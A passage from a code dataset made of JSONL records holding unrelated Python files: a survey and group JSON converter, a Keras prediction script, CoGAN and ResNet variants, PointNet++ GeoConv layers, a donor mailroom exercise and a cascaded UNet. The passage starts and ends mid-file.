questions_arr = []\n if jsonQuestions:\n if 'last' in jsonQuestions:\n jsonQuestions.pop('last')\n questions_id_list = list(jsonQuestions.keys())\n for question_id in questions_id_list:\n questions_arr.append(jsonQuestions[question_id])\n questions_arr[-1]['id'] = str(question_id)\n return questions_arr\n\n\"\"\"========================================================================\n*** Function: be_convsertJsonSurveys_toArr\n*** server: back end\n*** Description: convert the json surveys from db to array of surveys\n*** Arguments: jsonSurveys\n*** Return: array of surveys\n=========================================================================\"\"\"\ndef be_convertJsonSurveysData_toArr(json_surveys=None):\n \"\"\" return array of surveys \"\"\"\n surveys_arr = []\n if json_surveys:\n if 'last' in json_surveys:\n json_surveys.pop('last')\n surveys_ids_list = list(json_surveys.keys())\n #decleare arr of dictionarys\n for survey_id in surveys_ids_list:\n surveys_arr.append(be_getSurveyData(json_surveys[survey_id]))\n return surveys_arr\n\n\n\n\n\"\"\"========================================================================\n*** Function: be_convsertJsonGroup_toArr\n*** server: back end\n*** Description: convert the json group from db to array of groups\n all the data under the group will convert to arrays\n*** Arguments: jsonGroup\n*** Return: dict of user group while the data under it convert to array\n=========================================================================\"\"\"\ndef be_convsertJsonGroupData_toArr(json_group, user_data_json):\n \"\"\" be_convsertJsonGroup_toArr \"\"\"\n converted_group = {}\n if json_group:\n\n #Assign the entire group from db --> we convert the data bellow\n converted_group = json_group\n converted_group['id'] = str(json_group['id'])\n\n #Fatch surveys for group\n group_surveys = []\n if 'surveys' in json_group:\n group_surveys = be_convertJsonSurveysData_toArr(json_group['surveys'])\n converted_group['surveys'] = group_surveys\n\n #Fetch questions for group\n group_questions = []\n if 'questions' in json_group:\n group_questions = be_convertJsonQuestions_toArr(json_group['questions'])\n converted_group['questions'] = group_questions\n\n #Fetch Members\n group_members = []\n if 'members' in json_group:\n current_app.logger.debug('fetch members: {0}'.format(json_group['members']))\n group_members = be_convertJsonMembers_toArr(json_group['members'])\n converted_group['members'] = group_members\n\n #Fetch Admins\n group_admins = []\n if 'admins' in json_group:\n current_app.logger.debug('fetch admins: {0}'.format(json_group['members']))\n group_admins = be_convertJsonMembers_toArr(json_group['admins'])\n converted_group['admins'] = group_admins\n\n #Fetch chat data\n group_chat = []\n if 'chat' in json_group:\n group_chat = be_convertJsonChat_toArr(json_group['chat'])\n converted_group['chat'] = group_chat\n\n #ret_group['creation_data'] = group['creation_date']\n #ret_group['update_data'] = group['update_date']\n converted_group['image'] = ''#group['image']\n if json_group['image'] is True:\n converted_group['image'] = '/group/image/get'#get_group_image(group['id'])\n return converted_group\n","sub_path":"be_converter.py","file_name":"be_converter.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"568924357","text":"import argparse\nimport data\nfrom model import *\nimport numpy as np\nimport timeit\nimport time\nimport pandas as pd\nimport os\nfrom keras.models import load_model\nimport json\n\n# A note here: pre-trained embeddings should be incorporated already into the\n# saved model. We don't need to load them again.\n\nparser = argparse.ArgumentParser(description=\"A simple fasttext-style keras model\")\nparser.add_argument(\"--data\", type=str, default=\"./data.csv\",\n help=\"location of the data corpus\")\nparser.add_argument(\"--delimiter\", type=str, default=\",\",\n help=\"the delimiter to use when reading the delimited data\")\nparser.add_argument(\"--quotechar\", type=str, default='\"',\n help=\"the character for quoting text in the delimited data\")\nparser.add_argument(\"--model\", type=str, default=\"model\",\n help=\"file name for model (model.h5 and model.js)\")\nparser.add_argument(\"--out\", type=str, default=\"out.csv\",\n help=\"file name for output csv\")\nparser.add_argument(\"--label_only\", action=\"store_true\", default=False,\n help=\"only output the labels, for something like Kaggle\")\nargs = parser.parse_args()\n\nprocessor_json = json.load(open(args.model+\".json\", \"r\"))\nmodel_h5 = load_model(args.model+\".h5\")\n\n\nprocessor = data.FeatureProcessor()\nprocessor.restore(**processor_json)\n\nX_raw = processor.load_data(args.data)\n\nX = processor.transform(X_raw, verbose=0)\n\npredictions = get_predictions(\n model_h5.predict(X),\n processor_json[\"n_classes\"],\n processor_json[\"max_labels\"],\n processor_json[\"id2class\"],\n label_only=args.label_only)\n\ndf = pd.DataFrame(X_raw[0], columns=[\"x1\"])\nfor col in range(processor_json[\"x_cols\"]-1):\n df = pd.concat([df, pd.DataFrame(X_raw[col], columns=[f\"x{col+1}\"])], axis=1)\n\ndf = pd.concat([df, pd.DataFrame(predictions, columns=[\"predictions\"])], axis=1)\n\ndf.to_csv(args.out, index=False)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109741643","text":"import torch\nimport torch.nn as nn\nclass Generator(nn.Module):\n def __init__(self,img_shape=[3,128,128]):\n super(Generator,self).__init__()\n self.shape =img_shape\n self.init_size =self.shape[1] // 4\n self.fc =nn.Sequential(nn.Linear(100,128 *self.init_size**2 ))\n self.G_0 = nn.Sequential(\n nn.BatchNorm2d(128),\n nn.Upsample(scale_factor=2),\n nn.Conv2d(128,128,3,stride=1,padding=1),\n nn.BatchNorm2d(128,0.8),\n nn.LeakyReLU(0.2,inplace=True),\n nn.Upsample(scale_factor=2)\n )\n self.G_A =nn.Sequential(\n nn.Conv2d(128,64,3,stride=1,padding=1),\n nn.BatchNorm2d(64,0.8),\n nn.LeakyReLU(0.2,inplace=True),\n nn.Conv2d(64,self.shape[0],3,stride=1,padding=1),\n nn.Tanh()\n )\n self.G_B =nn.Sequential(\n nn.Conv2d(128,64,3,stride=1,padding=1),\n nn.BatchNorm2d(64,0.8),\n nn.LeakyReLU(0.2,inplace=True),\n nn.Conv2d(64,self.shape[0],3,stride=1,padding=1),\n nn.Tanh()\n )\n def forward(self,z):\n out =self.fc(z)\n out = out.view(out.shape[0],128,self.init_size,self.init_size)\n tmp =self.G_0(out)\n img_A =self.G_A(tmp)\n img_B =self.G_B(tmp)\n return img_A,img_B\n\nclass Discriminator(nn.Module):\n def __init__(self,img_shape=[3,128,128]):\n super(Discriminator,self).__init__()\n def block(in_,out_,normalize=True):\n out =[nn.Conv2d(in_,out_,img_shape[0],2,1)]\n if normalize:\n out.append(nn.BatchNorm2d(out_,0.8))\n out.extend([nn.LeakyReLU(0.2,inplace=True),nn.Dropout2d(0.25)])\n return out\n ds_size = img_shape[1] // 2**4\n self.D_A =nn.Linear(128*ds_size**2,1)\n self.D_B =nn.Linear(128*ds_size**2,1)\n self.D_shared =nn.Sequential(\n *block(3,16,normalize=False),\n *block(16,32),\n *block(32,64),\n *block(64,128)\n )\n def forward(self,img_A,img_B):\n d_A =self.D_shared(img_A)\n d_A =d_A.view(d_A.shape[0],-1)\n valid_A= self.D_A(d_A)\n d_B =self.D_shared(img_B)\n d_B =d_B.view(d_B.shape[0],-1)\n valid_B= self.D_B(d_B)\n return valid_A,valid_B","sub_path":"CoGAN/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599429284","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom layers import *\nfrom resnet import *\n\n\ndef _block_size(in_dim, out_dim, n_blocks, alpha=1.0):\n \"\"\"Returns block_size setting that ensures same memory cost as\n vanilla layer with corresponding in_dim and out_dim\"\"\"\n return int(in_dim * out_dim / (in_dim + out_dim) / n_blocks * alpha)\n\n\ndef _block_size_conv(in_ch, out_ch, filter_h, filter_w, n_blocks, alpha=1.0):\n return _block_size(in_ch * filter_h * filter_w, out_ch, n_blocks, alpha=alpha)\n\n\ndef _block_size_conv3x3(in_ch, out_ch, n_blocks, alpha=1.0):\n return _block_size_conv(in_ch, out_ch, 3, 3, n_blocks, alpha=alpha)\n\n\ndef lrm3x3(in_planes, out_planes, n_blocks, block_size, stride=1, cache_attn=True):\n \"\"\"3x3 low-rank mixture convolution with padding\"\"\"\n return LRMConvV2(in_planes, out_planes, 3, n_blocks, block_size,\n stride=stride, padding=1, cache_attn=cache_attn)\n\n\ndef lrm1x1(in_planes, out_planes, n_blocks, block_size, stride=1, cache_attn=True):\n \"\"\"1x1 low-rank mixture convolution with padding\"\"\"\n return LRMConvV2(in_planes, out_planes, 1, n_blocks, block_size,\n stride=stride, padding=0, cache_attn=cache_attn)\n\n\n# Modified from BasicBlock - https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\nclass LRMBlockV2(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None,\n n_blocks=1, block_size_alpha=1.0, cache_attn=True):\n super(LRMBlockV2, self).__init__()\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n\n block_size_conv1 = _block_size_conv3x3(inplanes, planes, n_blocks, alpha=block_size_alpha)\n block_size_conv = _block_size_conv3x3(planes, planes, n_blocks, alpha=block_size_alpha)\n\n self.conv1 = lrm3x3(inplanes, planes, n_blocks, block_size_conv1, stride=stride, cache_attn=cache_attn)\n self.bn1 = norm_layer(planes)\n self.conv2 = lrm3x3(planes, planes, n_blocks, block_size_conv, cache_attn=cache_attn)\n self.bn2 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\n# Modified from BasicBlock - https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\nclass HashBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None,\n detach=False, n_keys=256, cache_attn=False, temperature=1.0,\n cut_residual=False):\n super(HashBlock, self).__init__()\n\n ###################################\n self.detach = detach\n self.cut_residual = cut_residual\n ###################################\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n\n ###################################\n self.hashconv = HashConv(planes, planes, (3, 3), n_keys,\n detach=detach, cache_attn=cache_attn, t=temperature)\n ###################################\n\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n ###################################\n # cut gradient to residual if only training downstream layers\n if self.detach:\n identity = identity.detach()\n ###################################\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.hashconv(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n ###################################\n # cut the residual connection if specified\n if not self.cut_residual:\n out += identity\n ###################################\n\n out = self.relu(out)\n\n return out\n\n\n# Modified from ResNet - https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\nclass LRMResNetV2(nn.Module):\n\n def __init__(self, block, layers, num_classes=100, zero_init_residual=False,\n groups=1, width_per_group=64, replace_stride_with_dilation=None, norm_layer=None,\n n_blocks=1, block_size_alpha=1, route_by='task-dynamic', fit_keys=False):\n super(LRMResNetV2, self).__init__()\n self.task_id = None\n self.route_by = route_by\n self.n_blocks = n_blocks\n self.block_size_alpha = block_size_alpha\n self.param_n_blocks = nn.Parameter(torch.LongTensor([n_blocks]), requires_grad=False)\n self.param_block_size_alpha = nn.Parameter(torch.FloatTensor([block_size_alpha]), requires_grad=False)\n\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = LRMConvV2(3, self.inplanes, (7, 7), n_blocks,\n _block_size_conv(3, self.inplanes, 7, 7, n_blocks, alpha=block_size_alpha),\n stride=2, padding=3)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _set_route_by(m):\n if type(m) == LRMConvV2:\n m.route_by = route_by\n\n # set route_by for all LRMConv modules\n self.apply(_set_route_by)\n\n # running statistics\n self.running_entropy = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n self.running_cls_route_div = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n\n # disable grad on LRM block factors if we are only fitting keys\n if fit_keys:\n self.disable_block_grad()\n\n def _make_layer(self, block, planes, blocks, stride=1, dilate=False):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n block_size_downsample = _block_size(self.inplanes, planes * block.expansion, self.n_blocks,\n alpha=self.block_size_alpha)\n downsample = nn.Sequential(\n lrm1x1(self.inplanes, planes * block.expansion, self.n_blocks, block_size_downsample,\n stride=stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer,\n n_blocks=self.n_blocks, block_size_alpha=self.block_size_alpha))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer,\n n_blocks=self.n_blocks, block_size_alpha=self.block_size_alpha))\n\n return nn.Sequential(*layers)\n\n def _forward_impl(self, x):\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n # accumulate LRM stats\n if self.route_by != 'task':\n self.accumulate_entropy()\n if self.task_id is not None:\n self.accumulate_class_routing_divergence()\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n\n return x\n\n def forward(self, x):\n return self._forward_impl(x)\n\n def set_task_id(self, task_id):\n \"\"\"Set task id for the current task. Used for routing by task\"\"\"\n self.task_id = task_id\n\n def _set_task_id(m):\n if type(m) == LRMConvV2:\n m.task_id = task_id\n\n # set task_id for all LRMConv modules\n self.apply(_set_task_id)\n\n def restructure_blocks(self, n_blocks, block_size_alpha):\n def restructure_lrm_conv(m):\n if type(m) == LRMConvV2:\n block_size = _block_size_conv(m.in_channels, m.out_channels, *m.kernel_size, n_blocks, block_size_alpha)\n m.restructure_blocks(n_blocks, block_size)\n\n self.apply(restructure_lrm_conv)\n\n def get_sims(self):\n sims = {}\n for n, m in self.named_modules():\n if type(m) == LRMConvV2:\n sims[n] = m.cached_attn\n return sims\n\n def accumulate_entropy(self):\n for n, m in self.named_modules():\n if type(m) == LRMConvV2:\n self.running_entropy[n] += [m.avg_entropy]\n\n def reset_entropy(self):\n self.running_entropy = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n\n def get_entropy(self):\n return self.running_entropy\n\n def accumulate_class_routing_divergence(self, task_id=None):\n if task_id is None:\n task_id = self.task_id\n assert task_id is not None, 'task id is not set'\n for n, m in self.named_modules():\n if type(m) == LRMConvV2 and m.cached_attn is not None:\n sims = m.cached_attn.transpose(1, 3).reshape(-1, self.n_blocks)\n dim1 = sims.shape[0]\n self.running_cls_route_div[n] += [F.cross_entropy(sims, torch.LongTensor([task_id] * dim1)).item()]\n\n def reset_class_routing_divergence(self):\n self.running_cls_route_div = {n: [] for n, m in self.named_modules() if type(m) == LRMConvV2}\n\n def get_class_routing_divergence(self):\n return self.running_cls_route_div\n\n def reset_running_stats(self):\n self.reset_entropy()\n self.reset_class_routing_divergence()\n\n def disable_block_grad(self):\n def _disable_block_grad(m):\n if type(m) == LRMConvV2:\n m.disable_block_grad()\n self.apply(_disable_block_grad)\n\n def enable_block_grad(self):\n def _enable_block_grad(m):\n if type(m) == LRMConvV2:\n m.enable_block_grad()\n self.apply(_enable_block_grad)\n\n\ndef _lrm_resnet(Version, block, layers, num_classes=100, seed=1, disable_bn_stats=False, **kwargs):\n torch.manual_seed(seed)\n model = Version(block, layers, **kwargs)\n set_classification_layer(model, num_classes=num_classes)\n\n if disable_bn_stats:\n disable_bn_stats_tracking(model)\n return model\n\n\ndef lrm_resnet18(**kwargs):\n r\"\"\"ResNet-18 model from\n `\"Deep Residual Learning for Image Recognition\" `_\n \"\"\"\n return _lrm_resnet(LRMResNetV2, LRMBlockV2, [2, 2, 2, 2], **kwargs)\n\n\narchs = {\n 'resnet18': resnet18,\n 'lrm_resnet18': lrm_resnet18\n}\n\n\n# test model construction\nif __name__ == '__main__':\n lrm_resnet18()\n resnet18()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223316142","text":"\"\"\" PointNet++ Layers\n\nAuthor: Charles R. Qi\nDate: November 2017\n\"\"\"\n\nimport os\nimport sys\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(BASE_DIR)\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/sampling'))\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/grouping'))\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/3d_interpolation'))\nsys.path.append(os.path.join(BASE_DIR, '../tf_ops/geoconv'))\nfrom tf_sampling import farthest_point_sample, gather_point\nfrom tf_grouping import query_ball_point, group_point, knn_point\n\nfrom tf_geoconv import aggregate # 在这里,已经被加入到路径里面了sys.path.append(os.path.join(BASE_DIR, 'tf_ops/geoconv'))\nfrom tf_utils import perceptron, batch_norm_for_fc, batch_norm_for_conv1d\nimport tensorflow as tf\nimport numpy as np\n\n\ndef sample_and_group(npoint, radius, nsample, xyz, points, knn=False, use_xyz=True):\n '''\n Input:\n npoint: int32\n radius: float32\n nsample: int32\n xyz: (batch_size, ndataset, 3) TF tensor\n points: (batch_size, ndataset, channel) TF tensor, if None will just use xyz as points\n knn: bool, if True use kNN instead of radius search\n use_xyz: bool, if True concat XYZ with local point features, otherwise just use point features\n Output:\n new_xyz: (batch_size, npoint, 3) TF tensor\n new_points: (batch_size, npoint, nsample, 3+channel) TF tensor\n idx: (batch_size, npoint, nsample) TF tensor, indices of local points as in ndataset points\n grouped_xyz: (batch_size, npoint, nsample, 3) TF tensor, normalized point XYZs\n (subtracted by seed point XYZ) in local regions\n '''\n\n new_xyz = gather_point(xyz, farthest_point_sample(npoint, xyz)) # (batch_size, npoint, 3)\n if knn:\n _, idx = knn_point(nsample, xyz, new_xyz)\n else:\n idx, pts_cnt = query_ball_point(radius, nsample, xyz, new_xyz)\n grouped_xyz = group_point(xyz, idx) # (batch_size, npoint, nsample, 3)\n grouped_xyz -= tf.tile(tf.expand_dims(new_xyz, 2), [1, 1, nsample, 1]) # translation normalization\n if points is not None:\n grouped_points = group_point(points, idx) # (batch_size, npoint, nsample, channel)\n if use_xyz:\n new_points = tf.concat([grouped_xyz, grouped_points], axis=-1) # (batch_size, npoint, nample, 3+channel)\n else:\n new_points = grouped_points\n else:\n new_points = grouped_xyz\n\n return new_xyz, new_points, idx, grouped_xyz\n\n\ndef sample_and_group_all(xyz, points, use_xyz=True):\n '''\n Inputs:\n xyz: (batch_size, ndataset, 3) TF tensor\n points: (batch_size, ndataset, channel) TF tensor, if None will just use xyz as points\n use_xyz: bool, if True concat XYZ with local point features, otherwise just use point features\n Outputs:\n new_xyz: (batch_size, 1, 3) as (0,0,0)\n new_points: (batch_size, 1, ndataset, 3+channel) TF tensor\n Note:\n Equivalent to sample_and_group with npoint=1, radius=inf, use (0,0,0) as the centroid\n '''\n batch_size = xyz.get_shape()[0].value\n nsample = xyz.get_shape()[1].value\n new_xyz = tf.constant(np.tile(np.array([0, 0, 0]).reshape((1, 1, 3)), (batch_size, 1, 1)),\n dtype=tf.float32) # (batch_size, 1, 3)\n idx = tf.constant(np.tile(np.array(range(nsample)).reshape((1, 1, nsample)), (batch_size, 1, 1)))\n grouped_xyz = tf.reshape(xyz, (batch_size, 1, nsample, 3)) # (batch_size, npoint=1, nsample, 3)\n if points is not None:\n if use_xyz:\n new_points = tf.concat([xyz, points], axis=2) # (batch_size, 16, 259)\n else:\n new_points = points\n new_points = tf.expand_dims(new_points, 1) # (batch_size, 1, 16, 259)\n else:\n new_points = grouped_xyz\n return new_xyz, new_points, idx, grouped_xyz\n\n\ndef geoconv(feat, xyz, num_outputs, bypass_num_outputs,\n radius, decay_radius, bn=True, is_training=False,\n scope=None, bn_decay=None, activation_fn=tf.nn.relu,\n delta=False,dropout_self=0, dropout_edge_1=0, dropout_dege_2=0):\n ''' GeoCNN Geo-Conv\n Input:\n feat: (batch_size, num_point, input_channels) TF tensor\n points: (batch_size, num_point, 3) TF tensor\n num_outputs: the count of output channels\n bypass_num_outputs: the count of output channels of bypass\n radius: the inner radius of local ball of each point.\n decay radius: the outer radius of local ball of each point\n ...\n '''\n with tf.variable_scope(scope) as sc:\n feat_self = tf.layers.dropout(feat, rate=dropout_self, training=is_training) # dropout_self\n self = perceptron(feat_self, num_outputs, scope='self', is_training=is_training, bn=False, activation_fn=None)\n feat_edge = tf.layers.dropout(feat, rate=dropout_edge_1, training=is_training) # dropout_edge_1\n mutual = perceptron(feat_edge, bypass_num_outputs * 6, scope='mutual', is_training=is_training, bn=False,\n activation_fn=None)\n # 通过mlp计算出其在六个方向上的特征==》(计算geo特征,从B*N*C==》B*N*6*C,也即每一个点的每一个channel的特征都是分解为六个方向的特征,在aggregate里面会对六个方向的其中三个通过cos平方以及边缘点的计算出的权重进行聚合从何回归到B*N*C)\n ag, _ = aggregate(mutual, xyz, radius, decay_radius, delta)\n b, n, bc = ag.get_shape().as_list()\n _, _, c = self.get_shape().as_list()\n ag = tf.reshape(ag, (-1, bc))\n self = tf.reshape(self, (-1, c))\n\n if bn:\n ag = batch_norm_for_fc(ag, is_training, bn_decay, scope='mutual_bn')\n if activation_fn is not None:\n ag = activation_fn(ag)\n\n ag = tf.reshape(ag, (b, n, bc))\n ag = tf.layers.dropout(ag, rate=dropout_dege_2, training=is_training) # dropout_edge_2\n ag = perceptron(ag, num_outputs, scope='enlarge', is_training=is_training, bn=False, activation_fn=None)\n ag = tf.reshape(ag, (-1, c))\n\n outputs = self + ag\n\n if bn:\n outputs = batch_norm_for_fc(outputs, is_training, bn_decay, scope='enlarge_bn')\n if activation_fn is not None:\n outputs = activation_fn(outputs)\n\n outputs = tf.reshape(outputs, (b, n, c))\n\n return outputs\n\n","sub_path":"models/utils/geo_utils_SE.py","file_name":"geo_utils_SE.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"470218278","text":"donor_db = [(\"William Gates, III\", [653772.32, 12.17]),\n (\"Jeff Bezos\", [877.33]),\n (\"Paul Allen\", [663.23, 43.87, 1.32]),\n (\"Mark Zuckerberg\", [1663.23, 4300.87, 10432.0]),\n (\"Colleen Kaku\", [1000000,1000000,1000000])\n ]\n\ndef send_thank_you():\n while True:\n name=input(\"\\nDonor Full Name (type 'list' for donor list or 'q' to quit): \")\n if name=='q':\n return\n if name!='list':\n break\n list_donors()\n amount = input(\"Donation amount: \")\n if amount=='q':\n return\n if name.title() not in donor_names():\n donor_db.append((name,[]))\n for donor_name,amounts in donor_db:\n if donor_name==name:\n amounts.append(float(amount))\n print()\n print(thank_you_letter(name,float(amount)))\n\ndef donor_names():\n return [name for (name,amounts) in donor_db]\n\ndef list_donors():\n for donor_name,amounts in donor_db:\n print(' '+donor_name)\n\ndef thank_you_letter(name,amount):\n return f\"Dear Mr(s) {name},\\n\" \\\n f\"Thank you very much for your generous donation of ${amount:,.2f}.\\n\" \\\n f\"Sincerely,\\n\" \\\n f\"Python 210 Class of 2018\"\n\ndef create_a_report():\n summary_list = [(name,sum(amounts),len(amounts),sum(amounts)/len(amounts)) for (name,amounts) in donor_db]\n summary_list.sort(key=get_second,reverse=True)\n print(\"\\nDONOR NAME TOTAL DONATED NUM DONATIONS AVG DONATION AMT\")\n for (name,total,num,avg) in summary_list:\n print(f\"{name:20s} ${total:12,.2f} {num:3d} ${avg:12,.2f}\")\n\ndef get_second(elem):\n return elem[1]\n\ndef main():\n while True:\n print(\"\\nMAIN MENU\")\n print(\" 1 = Send a Thank You\")\n print(\" 2 = Create a Report\")\n print(\" q = Quit\")\n choice = input(\" ? \")\n if choice=='1':\n send_thank_you()\n continue\n if choice=='2':\n create_a_report()\n continue\n if choice=='q':\n break\n print(\"Invalid choice, try again\")\n continue\n\nif __name__=='__main__':\n main()","sub_path":"students/cocokaku/lesson3/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149129034","text":"import torch\nfrom torch import nn\n\nclass DoubleConv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, input):\n return self.conv(input)\n\n\nclass Unet_cascade(nn.Module):\n def __init__(self,in_ch,out_ch):\n super(Unet_cascade, self).__init__()\n\n self.conv1 = DoubleConv(in_ch, 64)\n self.pool1 = nn.MaxPool2d(2)\n self.conv2 = DoubleConv(64, 128)\n self.pool2 = nn.MaxPool2d(2)\n self.conv3 = DoubleConv(128, 256)\n self.pool3 = nn.MaxPool2d(2)\n self.conv4 = DoubleConv(256, 512)\n self.pool4 = nn.MaxPool2d(2)\n self.conv5 = DoubleConv(512, 1024)\n self.up6 = nn.ConvTranspose2d(1024, 512, 2, stride=2)\n self.conv6 = DoubleConv(1024, 512)\n self.up7 = nn.ConvTranspose2d(512, 256, 2, stride=2)\n self.conv7 = DoubleConv(512, 256)\n self.up8 = nn.ConvTranspose2d(256, 128, 2, stride=2)\n self.conv8 = DoubleConv(256, 128)\n self.up9 = nn.ConvTranspose2d(128, 64, 2, stride=2)\n self.conv9 = DoubleConv(128, 64)\n self.conv10 = nn.Conv2d(64,out_ch, 1)\n\n self.conv11 = DoubleConv(in_ch, 64)\n self.pool11 = nn.MaxPool2d(2)\n self.conv12 = DoubleConv(64, 128)\n self.pool12 = nn.MaxPool2d(2)\n self.conv13 = DoubleConv(128, 256)\n self.pool13 = nn.MaxPool2d(2)\n self.conv14 = DoubleConv(256, 512)\n self.pool14 = nn.MaxPool2d(2)\n self.conv15 = DoubleConv(512, 1024)\n self.up16 = nn.ConvTranspose2d(1024, 512, 2, stride=2)\n self.conv16 = DoubleConv(1024, 512)\n self.up17 = nn.ConvTranspose2d(512, 256, 2, stride=2)\n self.conv17 = DoubleConv(512, 256)\n self.up18 = nn.ConvTranspose2d(256, 128, 2, stride=2)\n self.conv18 = DoubleConv(256, 128)\n self.up19 = nn.ConvTranspose2d(128, 64, 2, stride=2)\n self.conv19 = DoubleConv(128, 64)\n self.conv20 = nn.Conv2d(64,out_ch, 1)\n\n def forward(self, x):\n c1 = self.conv1(x)\n p1 = self.pool1(c1)\n c2 = self.conv2(p1)\n p2 = self.pool2(c2)\n c3 = self.conv3(p2)\n p3 = self.pool3(c3)\n c4 = self.conv4(p3)\n p4 = self.pool4(c4)\n c5 = self.conv5(p4)\n up_6 = self.up6(c5)\n # print('every_size',c5.shape,up_6.shape, c4.shape,p4.shape)\n merge6 = torch.cat([up_6, c4], dim=1)\n c6 = self.conv6(merge6)\n up_7 = self.up7(c6)\n merge7 = torch.cat([up_7, c3], dim=1)\n c7 = self.conv7(merge7)\n up_8 = self.up8(c7)\n merge8 = 